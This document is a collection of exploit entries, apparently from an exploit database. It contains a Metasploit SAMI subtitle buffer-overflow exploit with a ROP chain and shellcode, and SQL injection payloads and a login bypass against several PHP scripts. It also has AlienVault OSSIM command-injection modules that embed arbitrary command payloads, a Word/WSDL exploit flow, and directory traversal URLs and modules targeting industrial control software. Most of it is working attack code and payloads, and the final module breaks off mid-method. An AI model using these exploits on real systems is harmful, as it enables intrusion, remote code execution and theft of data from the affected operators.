	include Msf::Exploit::FILEFORMAT

	# Module metadata.  DEP is on, so the file carries a ROP chain (msvcrt.dll)
	# that ends in kernel32!VirtualAlloc before the shellcode runs.
	# NOTE(review): Name and References say MPlayer while Description says
	# SMPlayer 0.6.9; SMPlayer is a front end for MPlayer, so presumably the
	# SAMI parser in the bundled MPlayer is the faulty one -- confirm.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mplayer SAMI Buffer Overflow',
			'Description'    => %q{ 
				This module exploits a stack based buffer overflow found in
				SMPlayer 0.6.9 (Permanent DEP /AlwaysON). The overflow is
				triggered during the parsing of an overly long string found
				in a malicious SAMI subtitle file. 
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'James Fitts' ],
			'Version'        => '$Revision: $',
			'References'     =>
				[
					[ 'BID', '49149' ],
					[ 'OSVDB', '74604' ],
					[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/mplayer_sami_subtitle_file_overflow' ],
					[ 'URL', 'http://labs.mwrinfosecurity.com/assets/149/mwri_mplayer-sami-subtitles_2011-08-12.pdf' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					# file-format module: nothing connects back to us while the
					# file is being generated
					'DisablePayloadHandler' => 'true',
				},
			'Payload'        =>
				{
					'Space'    => 700,
					# '<' and '{' are excluded on top of the usual bytes: they have
					# meaning to the SAMI/subtitle parser
					'BadChars' => "\x00\x0a\x0d\x3c\x7b",
					'StackAdjustment' => -3500,
					# getPC stub: jmp +3 / pop ecx / jmp +5 / call -8 leaves the
					# address of the bytes that follow in ecx (BufferRegister below)
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
                                        'DisableNops' => 'True',
                                        'EncoderOptions' =>
                                                {
                                                        'BufferRegister' => 'ECX',
                                                },
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP3 EN',
						{
							# pushad/ retn
							# msvcrt.dll
							'Ret' => 0x77c12df9,
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jun 14 2011',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME', [ true, 'The file name.',  'msfmsfa.smi']),
				], self.class)
	end

	# Overrides the framework NOP generator: 0x41 ("A") is printable, so it
	# survives the subtitle text parser, and decodes as inc ecx on x86.
	def make_nops(cnt)
		return "\x41" * cnt
	end

	# Build the 983-byte overflow string (pattern + pivot + ROP chain +
	# shellcode), wrap it in a minimal SAMI document and write the file.
	def exploit

		# Chain 2 => kernel32!virtualalloc
		# msvcrt.dll
		# 30 dwords (120 bytes) written at offset 83; executed after the stack
		# pivot in chain 1 below.  The 0x4141... dwords are pop fodder; per the
		# gadget comments the chain ends by calling VirtualAlloc via pushad and
		# then returning into the shellcode (push esp/ retn).
		gadgets = [
			0x77c23e7a,     # XOR EAX, EAX/ RETN
			0x77c13ffd,     # XCHG EAX, ECX/ RETN
			0x77c2c84b,     # MOV EBX, ECX/ MOV ECX, EAX/ MOV EAX, ESI/ POP ESI/ RETN 10
			0x41414141,
			0x77c127e5,	# INC EBX/ RETN
			0x41414141,
			0x41414141,
			0x41414141,
			0x41414141,
			0x77c3b860,	# POP EAX/ RETN
			0x41414141,
			0x77c2d998,	# POP ECX/ RETN
			0x41413141,	
			0x77c47918,	# SUB EAX, ECX/ RETN
			0x77c58fbc,	# XCHG EAX, EDX/ RETN
			0x77c3b860,     # POP EAX/ RETN
			0x41414141,
			0x77c2d998,     # POP ECX/ RETN
			0x41414101,	
			0x77c47918,     # SUB EAX, ECX/ RETN
			0x77c13ffd,	# XCHG EAX, ECX/ RETN
			0x77c53f3a,	# POP EBP/ RETN
			0x77c53f3a,	# POP EBP/ RETN
			0x77c39dd3,	# POP EDI/ POP ESI/ RETN
			0x77c39dd5,	# ROP NOP
			0x77c168cd,	# JMP EAX
			0x77c21d16,	# POP EAX/ RETN
			0x7c809af1,	# kernel32!virtualalloc
			0x77c12df9,	# PUSHAD/ RETN
			0x77c35524,	# PUSH ESP/ RETN
		].flatten.pack("V*")

		# 16 'A' bytes (inc ecx) in front of the encoded shellcode
		p = make_nops(16) + payload.encoded

		# 979 bytes of pattern, then target.ret (pushad/retn) at 979
		boom =  pattern_create(979)
		boom << [target.ret].pack('V')
		boom[83, gadgets.length] = gadgets
		boom[203, p.length] = p

		# Chain 1 => Stack Pivot
		# The four dwords just before target.ret; the "exec N" notes give the
		# order the original author expects them to run in.
		boom[963, 4] = [0x41414101].pack('V')	# Size
		boom[967, 4] = [0x77c58fbc].pack('V')	# XCHG EAX, EDX/ RETN	=> exec 2
		boom[971, 4] = [0x77c59f6b].pack('V')	# ADD DH, BL/ RETN	=> exec 1
		boom[975, 4] = [0x77c15ed5].pack('V')	# XCHG EAX, ESP/ RETN	=> exec 3


		# minimal SAMI document; the overlong string is the SYNC body
		smi = %Q|<SAMI>
<BODY>
	<SYNC Start=0>
	#{rand_text_alpha_upper(40)}
	#{boom}
</SAMI>|

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(smi)

	end

end
__END__

            
# # # # # 
# Exploit Title: Justdial Clone Script - SQL Injection 
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/z1mt4303451/php-scripts/justdial-clone-script
# Demo: http://74.124.215.220/~jusdil/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The `fid` parameter of restaurants-details.php is used in a SQL query without sanitisation, so an attacker can inject SQL; the proof of concept below is an error-based (duplicate-key) injection that returns the current database name.
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/restaurants-details.php?fid=[SQL]
# 
# 46'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
# 
# Etc..
# # # # #

            
# # # # # 
# Exploit Title: Theater Management Script - SQL Injection 
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/8o2b4417538/php-scripts/theater-management-script
# Demo: http://198.38.86.159/~dineshkumarwork/demo/movie/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The `moid` parameter of show-time.php (and the `eid`/`moid` parameters of event-detail.php and trailer-detail.php) are used in SQL queries without sanitisation, so an attacker can inject SQL; the proof of concept below is a UNION-based injection that lists table and column names from information_schema.
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/show-time.php?moid=[SQL]
# 
# -100'++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329)--+-
# 
# http://localhost/[PATH]/event-detail.php?eid=[SQL]
# 
# http://localhost/[PATH]/trailer-detail.php?moid=[SQL]
# 
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: PTC KSV1 Script 1.7 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/ptc-ksv1.php
# Demo: http://www.ksv1demo.gvmhosting.com/
# Version: 1.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The `type` parameter of gpt.php is used in a SQL query without sanitisation, so an attacker can inject SQL; the proof of concept below is an error-based (duplicate-key) injection that returns the current database name.
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/gpt.php?v=entry&type=[SQL]&id=1&
# 
# +'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='&id=1&
# 
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: Adserver Script 5.6 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/adserverscript.php
# Demo: http://adserverscript.gvmhosting.com/
# Version: 5.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The `id` parameter of manage-target.php is used in a SQL query without sanitisation, so an advertiser (a low-privilege account) can inject SQL; the proof of concept below is a UNION-based injection that returns the database user, name and version.
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/manage-target.php?id=[SQL]&wap=0
# 
# 13-13'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION())--+-&wap=0
# 
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: Enterprise Edition Payment Processor Script 3.7 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/payment-processor-script.php
# Demo: http://www.enterprise-edition.gvmhosting.com/
# Version: 3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The login form accepts `'or 1=1 or ''='` as user name and password (authentication bypass), and the `id` parameter of the products and bank pages (action=update) is used in SQL queries without sanitisation; the proof of concept below is a UNION-based injection that returns the database user, name and version.
# 
# Proof of Concept: 
# 
# 
# http://localhost/[PATH]/login
# 
# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
# 
# http://localhost/[PATH]/products?id=[SQL]&action=update
# 
# -1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,/*!00002CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update
# 
# http://localhost/[PATH]/bank?id=[SQL]&action=update
# 
# Etc..
# # # # #
            
require 'msf/core'
require 'rexml/document'

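class MetasploitModule < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include REXML

	# First release that #check treats as patched. Kept as a Gem::Version so
	# the comparison in #check is numeric rather than lexicographic.
	FIXED_VERSION = Gem::Version.new('4.7.0')

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'Alienvault OSSIM av-centerd Command Injection get_log_line',
			'Description'	=> %q{
				This module exploits a command injection flaw found in the get_log_line
				function found within Util.pm. The vulnerability is triggered due to an
				unsanitized $r_file parameter passed to a string which is then executed
				by the system
			},
			'Author' => [ 'james fitts' ],
			'License' => MSF_LICENSE,
			'References' =>
				[
					[ 'CVE', '2014-3805' ],
					[ 'OSVDB', '107992' ]
				],
			'Privileged'	=> true,
			'Platform'		=> 'unix',
			'Arch'			=> ARCH_CMD,
			'DefaultOptions' =>
				{
					'SSL' => true,
				},
			'Payload' =>
				{
					'Compat'	=> {
						'RequiredCmd'	=> 'perl netcat-e openssl python gawk'
					}
				},
			'DefaultTarget'	=> 0,
			'Targets' =>
				[
					# NOTE(review): the label says "<= 4.7.0" while #check reports
					# 4.7.0 itself as Safe — confirm which boundary is correct.
					['Alienvault <= 4.7.0',{}]
				],
			'DisclosureDate' => 'Jul 18 2014'))

		# av-centerd's SOAP listener; SSL is on by default (see DefaultOptions).
		register_options([Opt::RPORT(40007)], self.class)
	end

	# Probes the SOAP service with a get_dpkg call and reports whether the
	# target looks vulnerable.
	#
	# Versions are compared as Gem::Version objects. The original compared
	# Strings, which is lexicographic: "4.10.0" >= "4.7.0" is false, so a
	# patched 4.10.0 target would have been reported as Appears.
	#
	# NOTE(review): build_soap_request embeds the payload in every request,
	# so the check probe is not a passive fingerprint — confirm this is intended.
	#
	# @return [Msf::Exploit::CheckCode] Appears for an alienvault-center
	#   version below FIXED_VERSION, Safe otherwise (including when no
	#   well-formed version could be read from the response)
	def check
		version = extract_version(send_soap_request("get_dpkg"))
		return Exploit::CheckCode::Safe if version.nil? || version >= FIXED_VERSION

		Exploit::CheckCode::Appears
	end

	# Pulls the alienvault-center package version out of a get_dpkg response.
	#
	# @param res [Rex::Proto::Http::Response, nil] response to the probe
	# @return [Gem::Version, nil] the parsed version, or nil when the response
	#   is missing, is not a 200 from a SOAP::Lite server, or carries no
	#   well-formed version string (Gem::Version.new would raise on e.g. "4.7.")
	def extract_version(res)
		return nil unless res && res.code == 200

		server = res.headers['SOAPServer']
		return nil unless server && server =~ /SOAP::Lite/
		return nil unless res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/

		raw = Regexp.last_match(1)
		return nil if raw.empty? || !Gem::Version.correct?(raw)

		Gem::Version.new(raw)
	end

	# Builds the SOAP envelope for an AV/CC/Util +method+ call.
	#
	# The positional c-gensym elements line up with the Perl handler's
	# argument list (see the Util.pm excerpt after __END__); c-gensym13 is the
	# $r_file parameter named in the Description and carries the payload.
	#
	# @param method [String] SOAP method name (e.g. "get_dpkg", "get_log_line")
	# @return [String] serialized XML document
	def build_soap_request(method)
		xml = Document.new
		xml.add_element(
			"soap:Envelope",
			{
				"xmlns:xsi"				=> "http://www.w3.org/2001/XMLSchema-instance",
				"xmlns:soapenc"			=> "http://schemas.xmlsoap.org/soap/encoding/",
				"xmlns:xsd"				=> "http://www.w3.org/2001/XMLSchema",
				"soap:encodingStyle"	=> "http://schemas.xmlsoap.org/soap/encoding/",
				"xmlns:soap"			=> "http://schemas.xmlsoap.org/soap/envelope/"
			})

		body = xml.root.add_element("soap:Body")
		m = body.add_element(method, { 'xmlns'	=> "AV/CC/Util" })

		# Fixed values the original module sends for the leading arguments.
		args = []
		args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
		args[0].text = "All"

		args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
		args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"

		args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
		args[2].text = datastore['RHOST'].to_s

		args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
		args[3].text = rand_text_alpha(4 + rand(4))

		args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
		args[4].text = "/var/log/auth.log"

		# The command payload is base64-wrapped so it survives being embedded
		# in a single-quoted perl -e argument.
		args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
		perl_payload =  "system(decode_base64"
		perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
		args[5].text = "1;perl -MMIME::Base64 -e '#{perl_payload}';"

		xml.to_s
	end

	# POSTs a SOAP call to /av-centerd.
	#
	# @param method [String] SOAP method name, also used in the SOAPAction header
	# @param timeout [Integer] seconds to wait for a response
	# @return [Rex::Proto::Http::Response, nil] the response, nil on timeout
	def send_soap_request(method, timeout=20)
		soap = build_soap_request(method)

		send_request_cgi({
			'uri'		=> '/av-centerd',
			'method'	=> 'POST',
			'ctype'		=> 'text/xml; charset=UTF-8',
			'data'		=> soap,
			'headers'	=> {
				'SOAPAction'	=> "\"AV/CC/Util##{method}\""
			}
		}, timeout)
	end

	# Fires the get_log_line call. The 1 second timeout is deliberate in the
	# original: the response is not needed, only the request has to be sent.
	def exploit
		send_soap_request("get_log_line", 1)
	end
end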
__END__

/usr/share/alienvault-center/lib/AV/CC/Util.pm

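sub get_log_line {
    # Returns the last $number_lines lines of one of the allow-listed log
    # files as an array ref: ($systemuuid, status, @lines). Every argument
    # arrives from the SOAP dispatcher and is caller-controlled, so $r_file
    # and $number_lines are validated before they reach a process spawn.
    #
    # Hardening vs. the original: tail is started with the list form of
    # open(), which execs it directly without /bin/sh, so shell metacharacters
    # in $r_file are passed literally as a filename instead of interpreted.
    # Status strings are unchanged so existing callers keep working.
    my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines ) = @_;

    verbose_log_file(
        "GET LOG LINE  : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)"
    );

    my @ret = ("$systemuuid");

    # Reject traversal before $r_file is used anywhere else.
    if ( !defined $r_file or $r_file =~ /\.\./ ) {
        push( @ret, "File not auth" );
        return \@ret;
    }

    # $number_lines becomes a tail option: require a plain positive integer.
    # The original "<= 0" numeric compare accepted any string with a leading
    # digit (e.g. "5 foo"), since Perl numifies the prefix.
    if ( !defined $number_lines or $number_lines !~ /\A[0-9]+\z/ or $number_lines <= 0 ) {
        push( @ret, "Error in number lines" );
        return \@ret;
    }

    # Directories the caller may read from (same allow-list as the original).
    unless ( $r_file =~ m{\A/var/log/} or $r_file =~ m{\A/var/ossec/alerts/} or $r_file =~ m{\A/var/ossec/logs/} ) {
        push( @ret, "path not auth" );
        return \@ret;
    }

    if ( !-f $r_file ) {
        push( @ret, "File not found" );
        return \@ret;
    }
    push( @ret, "ready" );

    # List-form open: argv goes straight to execve(), no shell involved.
    my $tail_fh;
    unless ( open( $tail_fh, '-|', 'tail', '-n', $number_lines, $r_file ) ) {
        push( @ret, "Error reading file" );
        return \@ret;
    }
    my @content = <$tail_fh>;
    close($tail_fh);

    push( @ret, @content );
    return \@ret;
}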


            
Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample

Running CVE-2017-8759 exploit sample.

Flow of the exploit:

Word macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over WSDL, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe, which in turn runs a PowerShell command that runs mspaint.exe

To test:

Run a web server on port 8080 and put the files exploit.txt and cmd.hta in its document root, for example with `python -m SimpleHTTPServer 8080`.

If all is good mspaint should run.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42711.zip

            
require 'msf/core'

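class MetasploitModule < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize
		super(
			'Name'        => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution',
			'Description' => %q{
				This module exploits a command injection vulnerability found within the sync_rserver
				function in Util.pm. The vulnerability is triggered due to an incomplete blacklist
				during the parsing of the $uuid parameter. This allows for the escaping of a system
				command allowing for arbitrary command execution as root
			},
			'References'  =>
			[
				[ 'CVE', '2014-3804' ],
				[ 'ZDI', '14-197' ],
				[ 'URL', 'http://forums.alienvault.com/discussion/2690' ],
			],
			'Author'      => [ 'james fitts' ],
			'License'     => MSF_LICENSE,
			'DisclosureDate' => 'Jun 11 2014')

		register_options([
			Opt::RPORT(40007),
			OptBool.new('SSL',   [true, 'Use SSL', true]),
			# The original description ("This is the file to download") was a
			# copy-paste leftover from another module; CMD is the command string
			# placed in the $uuid parameter.
			OptString.new('CMD', [ false, 'Command string sent in the uuid parameter', 'touch /tmp/file.txt'])
		], self.class)
	end

	# Builds the sync_rserver SOAP envelope. Element order and the CRLF line
	# endings reproduce the original hand-concatenated request byte for byte;
	# only c-gensym5 (the $uuid argument, see the Util.pm excerpt after
	# __END__) is operator-controlled. The leading "&" is the shell character
	# the server-side deny-list does not cover.
	#
	# @return [String] request body
	def build_soap_request
		lines = [
			%q|<?xml version="1.0" encoding="UTF-8"?>|,
			%q|<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"|,
			%q|xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema"|,
			%q|xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"|,
			%q|soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">|,
			%q|<soap:Body>|,
			%q|<sync_rserver xmlns="AV/CC/Util">|,
			%q|<c-gensym3 xsi:type="xsd:string">All</c-gensym3>|,
			%Q|<c-gensym5 xsi:type="xsd:string">& #{datastore['CMD']} </c-gensym5>|,
			%Q|<c-gensym7 xsi:type="xsd:string">#{datastore['RHOST']}</c-gensym7>|,
			%Q|<c-gensym9 xsi:type="xsd:string">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>|,
			%q|</sync_rserver>|,
			%q|</soap:Body>|,
			%q|</soap:Envelope>|
		]
		lines.join("\r\n") + "\r\n"
	end

	# Sends the request and reports on the HTTP status. A 200 only means the
	# SOAP call was dispatched by av-centerd; it is not proof that CMD ran.
	def run
		res = send_request_cgi(
			{
				'uri'	=>	'/av-centerd',
				'method'	=>	'POST',
				'ctype'		=>	'text/xml; charset=UTF-8',
				'data'		=>	build_soap_request,
				'headers'	=>	{
					'SOAPAction'	=>	"\"AV/CC/Util#sync_rserver\""
				}
			}, 20)

		if res && res.code == 200
			print_good("Command executed successfully!")
		else
			print_bad("Something went wrong...")
		end
	end

end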
__END__

/usr/share/alienvault-center/lib/AV/CC/Util.pm

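sub sync_rserver
{
    # Applies /tmp/sync_<uuid>.sql to the local database and rotates it to
    # .old. $uuid is caller-supplied and is interpolated into shell command
    # lines below (md5sum via backticks, the ossim-db redirection), so it must
    # not be able to carry shell syntax.
    my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_;
    verbose_log_file(
        "SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)"
    );

    # Allow-list instead of the original deny-list /[;`\$\<\>\|]/, which left
    # out characters such as "&" and newline. Only the characters that make up
    # a UUID are accepted; if every caller sends canonical UUIDs, a strict
    # 8-4-4-4-12 pattern would be tighter still.
    if ( !defined $uuid or $uuid !~ /\A[0-9A-Fa-f-]+\z/ ) {
        my $shown = defined $uuid ? $uuid : '';
        console_log_file("Not allowed uuid: $shown in sync_rserver\n");
        my @ret = ("Error");
        return \@ret;
    }

    my $conn = Avtools::get_database();
    my $sqlfile = "/tmp/sync_${uuid}.sql";
    my $sqlfile_old = "/tmp/sync_${uuid}.sql.old";
    # Safe to interpolate now that $uuid is restricted to [0-9A-Fa-f-].
    my $sqlfile_md5 = `md5sum $sqlfile | awk '{print \$1}'`;
    my $sqlfile_content;
    my $status = 1;
    my $counter = 0;
    my @ret;
    my $query = qq{};
    my $dbq;

    # Skip the sync when the new file is identical to the last applied one.
    if ( -f $sqlfile_old )
    {
        my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print \$1}'`;
        debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5");
        if ( $sqlfile_md5 eq $sqlfile_old_md5 )
        {
            unlink $sqlfile;
            verbose_log_file ("Already sync'ed!");
            return "0";
        }
        else
        {
            unlink $sqlfile_old;
        }
    }

    # Any output from ossim-db (stdout or stderr) is treated as an error.
    my $query_array = `ossim-db < $sqlfile 2>&1`;
    $query_array =~ s/[\s\n]+$//g;
    if ($query_array ne '')
    {
        $status = $query_array;
    }
    else
    {
        $status = 0;
    }

    if ( ! (defined $status) or $status == 0 )
    {
        # NOTE(review): this grep tests the file *name* string, not the
        # file's contents — confirm the intent before relying on it.
        if ( grep /RESTART\sOSSIM\-SERVER/, $sqlfile )
        {
            verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server");
            system('/etc/init.d/ossim-server restart');
        }
        else
        {
            debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart");
        }

        $query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())};
        debug_log_file($query);
        $dbq = $conn->prepare($query);
        $dbq->execute();
        $dbq->finish();
    }
    else
    {
        verbose_log_file ("Error syncing rservers: ${status}");
    }

    debug_log_file("Move file: $sqlfile");
    move ($sqlfile, $sqlfile . ".old");

    # NOTE(review): the validation failure above returns an array ref while
    # the success paths return the string "0" — callers must handle both.
#    push @ret, "0";
    return "0";
}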
            
#######################################################################

                             Luigi Auriemma

Application:  Carel PlantVisor
              http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_prodotto=310
Versions:     <= 2.4.4
Platforms:    Windows
Bug:          directory traversal
Exploitation: remote
Date:         13 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's homepage:
"PlantVisor Enhanced is monitoring and telemaintenance software for
refrigeration and air-conditioning systems controlled by CAREL
instruments."


#######################################################################

======
2) Bug
======


CarelDataServer.exe is a web server listening on port 80.

The software is affected by a directory traversal vulnerability that
allows downloading files located on the disk where it is installed.
Both slash and backslash, as well as their URL-encoded forms, are accepted.


#######################################################################

===========
3) The Code
===========


http://SERVER/..\..\..\..\..\..\boot.ini
http://SERVER/../../../../../../boot.ini
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
http://SERVER/..%2f..%2f..%2f..%2f..%2f..%2fboot.ini


#######################################################################

======
4) Fix
======


No fix.


#######################################################################
            
require 'msf/core'

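class MetasploitModule < Msf::Auxiliary
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Carel Pl@ntVisor Directory Traversal',
			'Description'    => %q{
				This module exploits a directory traversal vulnerability
				found in Carel Pl@ntVisor <= 2.4.4. The vulnerability is
				triggered by sending a specially crafted GET request to the
				victim server.
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2011-3487' ],
					[ 'BID', '49601' ],
				],
			'DisclosureDate' => 'Jun 29 2012'))

		register_options(
			[
				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
				Opt::RPORT(80)
			], self.class )
	end

	# Number of "..%5c" segments to prepend. Falls back to 10 when DEPTH is
	# unset, non-numeric, zero or negative; the original only caught nil and
	# 0, so a negative DEPTH produced an empty traversal prefix.
	#
	# @return [Integer] traversal depth, always >= 1
	def traversal_depth
		depth = datastore['DEPTH'].to_i
		depth <= 0 ? 10 : depth
	end

	# Requests FILE through the traversal prefix and stores a non-empty body
	# as loot. Unlike the original, a missing or non-200 response is reported
	# instead of silently returning.
	def run
		levels = "/" + ("..%5c" * traversal_depth)
		target_file = datastore['FILE'].to_s

		res = send_request_raw({
			'method'	=> 'GET',
			'uri'		=> "#{levels}#{target_file}",
		})

		unless res && res.code == 200
			print_error("#{rhost}:#{rport} did not return #{target_file} (#{res ? res.code : 'no response'})")
			return
		end

		loot = res.body
		if loot.nil? || loot.empty?
			print_status("File from #{rhost}:#{rport} is empty...")
			return
		end

		file = ::File.basename(target_file)
		path = store_loot('plantvisor.file', 'application/octet-stream', rhost, loot, file, target_file)
		print_status("Stored #{target_file} to #{path}")
	end
end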

            
require 'msf/core'

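class MetasploitModule < Msf::Auxiliary
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Carlo Gavazzi Powersoft Directory Traversal',
			'Description'    => %q{
				This module exploits a directory traversal vulnerability
				found in Carlo Gavazzi Powersoft <= 2.1.1.1. The vulnerability
				is triggered when sending a specially crafted GET request to the
				server. The location parameter of the GET request is not sanitized
				and the sendCommand.php script will automatically pull down any
				file requested
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'URL', 'http://gleg.net/agora_scada_upd.shtml']
				],
			'DisclosureDate' => 'Jan 21 2015'))

		register_options(
			[
				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
				OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),
				OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin']),
				Opt::RPORT(80)
			], self.class )
	end

	# Number of "../" segments to prepend. Falls back to 10 when DEPTH is
	# unset, non-numeric, zero or negative; the original only caught nil and
	# 0, so a negative DEPTH produced an empty traversal prefix.
	#
	# NOTE(review): the fallback is 10 while the DEPTH option defaults to 8 —
	# confirm which value is intended.
	#
	# @return [Integer] traversal depth, always >= 1
	def traversal_depth
		depth = datastore['DEPTH'].to_i
		depth <= 0 ? 10 : depth
	end

	# Requests FILE through the traversal prefix with HTTP Basic auth and
	# stores a non-empty body as loot. A missing or non-200 response is
	# reported instead of silently returning.
	def run
		require 'base64'

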